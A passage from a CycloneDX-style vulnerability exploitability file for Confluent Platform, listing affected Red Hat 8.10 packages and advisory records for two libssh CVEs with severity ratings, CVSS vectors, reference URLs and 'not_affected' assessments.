          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0964",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A malicious SCP server can send unexpected paths that could make the\nclient application override local files outside of working directory.\nThis could be misused to create malicious executable or configuration\nfiles and make the user execute them under specific consequences.\n\nThis is the same issue as in OpenSSH, tracked as CVE-2019-6111.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0964"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0964"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18160.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0964.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0964"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0964"
        },
        {
          "url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2026-0964.txt"
        }
      ],
      "published": "2026-03-26T21:17:00+00:00",
      "updated": "2026-06-17T10:11:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0965",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        73
      ],
      "description": "A flaw was found in libssh where it can attempt to open arbitrary files during configuration parsing. A local attacker can exploit this by providing a malicious configuration file or when the system is misconfigured. This vulnerability could lead to a Denial of Service (DoS) by causing the system to try and access dangerous files, such as block devices or large system files, which can disrupt normal operations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0965"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0965"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18160.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0965.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0965"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0965"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2026-0965.txt"
        }
      ],
      "published": "2026-03-26T21:17:00+00:00",
      "updated": "2026-06-17T10:11:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
